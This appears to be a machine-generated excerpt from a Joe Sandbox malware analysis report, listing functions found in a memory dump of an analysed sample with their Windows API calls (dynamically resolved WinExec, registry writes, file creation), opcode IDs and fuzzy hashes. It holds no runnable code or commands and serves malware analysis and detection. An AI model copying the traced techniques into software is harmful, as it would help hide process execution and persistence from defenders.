                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c0ba38fd736557260bf1e82201c6bbbac882f0db179763caa7dd5329a84654f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6357a258d8f19e4eb2bfa3174c6fab68c864771b78bc4a1933b13c4c735c0cc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c0ba38fd736557260bf1e82201c6bbbac882f0db179763caa7dd5329a84654f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19411F35B402099BEB41EBE4D981ADFB7BAEF8C700F104865F641A7291DE78ED018F55
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B085BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02B08624
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 420be41eee67d972e1c524abcd1ef77f9c5841eb8d6b6f7327575ed7ec76bf28
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3452a542d99a1d9e9cbc766d7845749b1c4a14d15b8ab5b4602aa0c5fa1fb870
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 420be41eee67d972e1c524abcd1ef77f9c5841eb8d6b6f7327575ed7ec76bf28
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53018171684304BFE741EFE4DC81F6A7BADE70D700F5284A0BA04D7690DE34AE119A64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B085BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02B08624
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7a7b12ab50e05a6ffb9f0fdd9e1703fafa76b2459d908d0682f08d865cf2608e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f717c1983cdafc8093f2b4010a308be03e9c089ea3cdddc4dc8148615d9e4ab8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7b12ab50e05a6ffb9f0fdd9e1703fafa76b2459d908d0682f08d865cf2608e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F08171684304AFE741EFE4DC81F5A7BADE70D700F5284A0BA04D7690DE34AE119A64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B05C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B05D74,?,?,02B03900,00000001), ref: 02B05C88
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B05D74,?,?,02B03900,00000001), ref: 02B05CB6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B03900,02B05CF6,00000000,02B05D74,?,?,02B03900), ref: 02AF7DAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B03900,02B05D11,00000000,02B05D74,?,?,02B03900,00000001), ref: 02AF7FB7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,02B05D74,?,?,02B03900,00000001), ref: 02B05D1B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02AFC3D9,00000000,02AFC433), ref: 02AFA797
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ddb4ec1b2c6a3f9a16e309c987a23e0ca8debb5f754ba66ea198a6fa3457464
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b726a2607612dbd9d962bb1ecf7ca78fb87d2b9b9e201f1735b30c1bf0b375e4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ddb4ec1b2c6a3f9a16e309c987a23e0ca8debb5f754ba66ea198a6fa3457464
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F319670A406099FDB51EFE4C981BDEBBF6AF08700F908565E604AB790DB795D048FA1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02C6BA58), ref: 02B0F258
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F290
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(0000087C,0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F29B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d8a9b2a8d28382a95da1a5c6e05ae115c4525156650d040ae02492e4f3bfb4f3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c72e5bb483464bf5474353ffa537f283916efb0a95f3283b472145ab3a7a406c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8a9b2a8d28382a95da1a5c6e05ae115c4525156650d040ae02492e4f3bfb4f3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2611FB71780204AFEB41EFA9DA85A9A7BEDEB08700B404561FA14E7650DE39EE408F54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02C6BA58), ref: 02B0F258
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F290
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(0000087C,0000087C,00000000,00000000,00000001,00000000,0000001C,00000000,02B0F2C3), ref: 02B0F29B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7097c0083940599aa171c6d52bed8e01f8d31c5cb693e751b21b46740fe30eab
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 27b29a22da95398d55e8eb4756a76025eb16e239f7561a7dd9c4c63b533ed6b1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7097c0083940599aa171c6d52bed8e01f8d31c5cb693e751b21b46740fe30eab
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1311FB71780204AFDB41EFA9DA85A9A7BADEB08700B404561FA14E7650DE39EE408F54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 41465167b4fb9c6f6bb2a6ce2d3585ada07d76a6f0ae9f70383d5ded69f0c0c4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 35d4dad4655c1892fff4cf3c9b7ba69cb399c079cad199e15c1c9c9017037e2b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41465167b4fb9c6f6bb2a6ce2d3585ada07d76a6f0ae9f70383d5ded69f0c0c4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F08C21748218C79AA0ABFA8BC866D66AA5F4075070016B6B7069B171CF6CCC49CB62
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
                                                                                                                                                                                                                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4D5B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02AF4D6D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9b89eac7fcfd5926e2431ba6af78d562998cf5d254b09dee2956cacd159b55b6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E0C2B82012019EFF942FE18E80B37732AAFC1740B5480A8BB00CA010DF3DC441AD38
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B070DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 02B073DA
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 58ad382747aa1439b0df8d3b4d92a36aeb0e28cfd34436b39323762a65539db2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e00211259aaede79a66b960136b3a11b2a883ad522d8f8130ee8ea0a9bba6d4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ad382747aa1439b0df8d3b4d92a36aeb0e28cfd34436b39323762a65539db2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69B1C174A016089FDB15CF99D5C0A9DFBF2FF89314F2481A9E945AB3A0DB30A845DF50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02AFE781
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFE364: VariantClear.OLEAUT32(?), ref: 02AFE373
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f013dd5b18c2466fb6326ca7b13fd00dac1e4dc24a4ddfb0130634b0329b13d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 03097698698c7b3881ef54bef7fd75225d371a0de2f4d3964985ad14514d56c3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f013dd5b18c2466fb6326ca7b13fd00dac1e4dc24a4ddfb0130634b0329b13d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2511733074021087D7B0AFA9CBC4A6667ABAF457507104466F74A8B675DF38CC45CBA2
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
